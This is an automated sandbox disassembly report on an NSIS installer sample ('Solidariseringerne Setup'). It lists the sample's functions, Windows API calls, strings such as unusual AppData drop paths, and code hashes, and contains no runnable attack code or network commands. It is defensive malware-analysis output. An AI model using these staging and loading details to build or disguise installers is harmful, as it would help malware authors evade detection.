Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Solidariseringerne Setup: Completed
API String ID: 3282139019-345998224
Opcode ID: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
Instruction ID: f34c7ad61b4b1b4f5354d92f7eace51acccef8372a8e2d808ca2954a926f6951
Opcode Fuzzy Hash: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
Instruction Fuzzy Hash: 65C1B171A04205BBDB216F61ED45E2B7E7CFB45706F40443EF601B11E1C779A942AB2E

Function 0040377F Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4

lstrcatA.KERNEL32(1033,Solidariseringerne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Solidariseringerne Setup: Completed,00000000,00000002,76F93410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AwMu7gR48D.exe",00000000), ref: 004037FA
lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Solidariseringerne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Solidariseringerne Setup: Completed,00000000,00000002,76F93410), ref: 0040386F
lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6

Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A

RegisterClassA.USER32(00422EA0), ref: 00403913
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040392B
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403960
ShowWindow.USER32(00000005,00000000), ref: 00403996
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039C2
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039CF
RegisterClassA.USER32(00422EA0), ref: 004039D8
DialogBoxParamA.USER32(?,00000000,00403B1C,00000000), ref: 004039F7

Strings

_Nb, xrefs: 004038F2, 0040395A
Control Panel\Desktop\ResourceLocale, xrefs: 004037B3
1033, xrefs: 0040379F, 004037F5
: Completed, xrefs: 0040383D, 00403845, 00403852, 0040389C, 004038A2
.DEFAULT\Control Panel\International, xrefs: 004037E5
C:\Users\user\AppData\Local\Temp\, xrefs: 00403784
"C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 00403783
RichEdit, xrefs: 004039C9
RichEd20, xrefs: 0040399C
C:\Users\user\AppData\Local\unshabbily, xrefs: 00403809, 00403811, 004038A9, 004038AF, 004038BF
RichEd32, xrefs: 004039AA
Solidariseringerne Setup: Completed, xrefs: 004037AB, 004037B1, 004037D6, 004037DF, 004037F4
.exe, xrefs: 0040387C
RichEdit20A, xrefs: 004039BA, 004039C0

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Solidariseringerne Setup: Completed$_Nb
API String ID: 1975747703-567170757
Opcode ID: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
Instruction ID: d12dedd32edb2aff813830401e41f02ecd086126c72271397d80de36ce2b18ee
Opcode Fuzzy Hash: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
Instruction Fuzzy Hash: 1E61C6B1744240BEE620BF669D45F373AACEB84759F40447EF940B22E2D77C9D029A2D

Function 00402D48 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D59
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\AwMu7gR48D.exe,00000400), ref: 00402D75

Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405ACC
Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AwMu7gR48D.exe,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00402DC1

Strings

Error launching installer, xrefs: 00402D98
"C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 00402D48
Null, xrefs: 00402E3F
C:\Users\user\Desktop\AwMu7gR48D.exe, xrefs: 00402D5F, 00402D6E, 00402D82, 00402DA2
C:\Users\user\Desktop, xrefs: 00402DA3, 00402DA8, 00402DAE
Inst, xrefs: 00402E2D
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
soft, xrefs: 00402E36
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D4F

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\AwMu7gR48D.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-899594266
Opcode ID: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
Instruction ID: ef8309496f7f1060f742aea9483ad6a943d4cc908664d4bedc23fec409a9c2f2
Opcode Fuzzy Hash: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
Instruction Fuzzy Hash: F251D5B1A40215ABDF209F65DE89B9E7AB8FB04355F10413BE900B62D1C7BC9E418B9D

Function 00405F51 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 0040607C
GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,0040508E,Completed,00000000), ref: 0040608F
SHGetSpecialFolderLocation.SHELL32(0040508E,00000000,?,Completed,00000000,0040508E,Completed,00000000), ref: 004060CB
SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 004060D9
CoTaskMemFree.OLE32(00000000), ref: 004060E5
lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406109
lstrlenA.KERNEL32(: Completed,?,Completed,00000000,0040508E,Completed,00000000,00000000,0040E8C0,00000000), ref: 0040615B

Strings

Completed, xrefs: 00405F76
: Completed, xrefs: 00405F7B, 00406048, 00406049, 0040604A, 00406066, 0040607B, 0040608E, 004060AA, 004060D5, 00406108, 0040610E, 00406126, 00406139, 00406154, 0040615A, 00406162, 0040618C
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040604B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406103

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-905382516
Opcode ID: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
Instruction ID: ad9c483c4d11e0ac1e74b91e3c17e9742ad78b5bc63621c1ce792900c2eda604
Opcode Fuzzy Hash: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
Instruction Fuzzy Hash: 5361D0B1A00115ABDF209F64CD81BBA7BB4DB45304F15813FEA03BA2D2D27C4962DB5E

Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily\Hardwire,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,307,307,00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily\Hardwire,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C

Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

Strings

open C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Hilltrot242.Boo, xrefs: 00401826, 00401842
307, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\unshabbily\Hardwire, xrefs: 00401786

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: 307$C:\Users\user\AppData\Local\unshabbily\Hardwire$open C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Hilltrot242.Boo
API String ID: 1941528284-2746477103
Opcode ID: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
Instruction ID: 5e97bff851cc073dc2a03fd3a0d2357d8c44b4856d4f0a7a75adeada814ade30
Opcode Fuzzy Hash: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
Instruction Fuzzy Hash: 7A41E771A10516BACF107BA5DC86DAF3A78DF45369B20823BF525F11E1C63C8A418E6D

Function 00405056 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

Strings

Completed, xrefs: 00405076, 00405088, 0040508E, 004050B1, 004050BD

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
Instruction ID: e673b9bb112aa3472437e231988a5d641118b75a6dbc9ddacfe4bdcedf5bb5e7
Opcode Fuzzy Hash: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
Instruction Fuzzy Hash: 49217A71A00508BBDF11DFA5DD80ADFBFA9EB08354F14807AF944A6291C2788A41CFA8

Function 0040551C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F
GetLastError.KERNEL32 ref: 00405573
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405588
GetLastError.KERNEL32 ref: 00405592

Strings

ts@, xrefs: 00405522
ds@, xrefs: 00405551
C:\Users\user\Desktop, xrefs: 0040551C
C:\Users\user\AppData\Local\Temp\, xrefs: 00405542

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-3398839520
Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction ID: 8a370a5fbdfdad71dc8e0bfd81c54348e454926cd11c3a1ff2f48966e6f5c6f5
Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction Fuzzy Hash: D0010871D04259EAEF01DBA1CC447EFBBB9EB04354F00857AD904B6290E378A604CFAA

Function 00406259 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
wsprintfA.USER32 ref: 004062A9
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD

Strings

\, xrefs: 00406281
UXTHEME, xrefs: 00406262
%s%s.dll, xrefs: 004062A3

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction ID: 482dcefc063d93e198aa1db7e000bfd15e9281d4181d763578a6ff71fc22a1d9
Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction Fuzzy Hash: EAF0F630A10109AEDF14ABA4DD0DFFB375CAB08304F1405BAB64AE11D2E678E9248B69

Function 00402F81 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402FDF
GetTickCount.KERNEL32 ref: 00403060
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040308D
wsprintfA.USER32 ref: 0040309D

Strings

... %d%%, xrefs: 00403097

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
Instruction ID: 60d675f18a734e15d0b5dd350d1cecbd4da5e6a0cde0341d3a53a3cb480860e8
Opcode Fuzzy Hash: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
Instruction Fuzzy Hash: FA519F71901219DBCB10EF65D9046AF7BB8AB04756F14413BF811B72C1C7789E51CBAA

Function 00405AF7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405B0B
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B25

Strings

"C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 00405AF7
C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFA
nsa, xrefs: 00405B02

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2439133018
Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction ID: d7521d4eade0cbd7120b41c29d2b11454b957a1e542ceee7a25420a70a1b98fd
Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction Fuzzy Hash: CFF082367082047BDB108F56DC04B9B7FA8DF91750F10803BFA08AA291D6B4B9558B69

Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028

Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
GetProcAddress.KERNEL32(00000000,?), ref: 00402048
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
Instruction ID: 772c7401ca61f63a6a86f526de26f8a62e510dd82d200dd974b96084c7de1680
Opcode Fuzzy Hash: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
Instruction Fuzzy Hash: 7F21DB71B04225B7CF207FA48E49B6E7A70AB44358F20413BFB15B22D0D7BD8942D65E

